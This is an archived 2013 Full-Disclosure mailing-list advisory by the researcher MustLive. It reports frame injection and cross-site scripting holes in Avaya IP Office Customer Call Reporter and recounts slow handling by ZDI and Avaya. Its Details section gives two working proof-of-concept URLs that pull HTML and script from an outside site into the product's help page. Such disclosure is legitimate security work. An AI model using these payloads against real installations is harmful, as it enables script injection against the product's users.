| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 21 Aug 2013 23:51:37 +0300 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>, "1337 Exploit DataBase" <mr.inj3ct0r@...il.com> Subject: Vulnerabilities in Avaya IP Office Customer Call Reporter Hello list! I want to warn you about vulnerabilities in Avaya IP Office Customer Call Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site Scripting) vulnerabilities. After I found multiple vulnerabilities in Avaya IP Office Customer Call Reporter in December, I informed ZDI about them (critical ones). ZDI was very slow in processing these holes (regardless of my remindings) and only at 30th of July they begun actively working with them. I wrote about this case with ZDI in WASC Mailing List (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html). When Avaya ignored my informing in July and ZDI stopped working on this case in August (since Avaya was not responding to them also), I published these two vulnerabilities (the least critical). There are many other vulnerabilities, including critical holes which allow to take control over admin panel, so Avaya still has a chance to get details of vulnerabilities in their product before public disclosure. ------------------------- Affected products: ------------------------- Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in December 2012) and 9.0.0.0 (tested recently) and previous versions. ------------------------- Affected vendors: ------------------------- Avaya Inc. http://www.avaya.com ---------- Details: ---------- Remote HTML Include (Frame Injection) (WASC-12): http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua Remote XSS Include (Cross-Site Scripting) (WASC-08): http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html ------------ Timeline: ------------ 2012.12.06 - found multiple vulnerabilities (these ones and other critical holes). 2012.12.13 - informed ZDI about other critical vulnerabilities. 2012.12.18 - again informed ZDI about other critical vulnerabilities. 2013.01.27 - registered at zerodayinitiative.com and informed them through the site. ZDI started working on the case. 2013.07.28 - informed Avaya (via two contact forms) about these holes and other critical vulnerabilities, due to slowness of ZDI. 2013.07.29 - wrote about ZDI in WASC Mailing List. 2013.07.30 - if earlier ZDI only pretended they work on the case, then this time they started working actively on it (and tried to contact Avaya). 2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was not responding. 2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists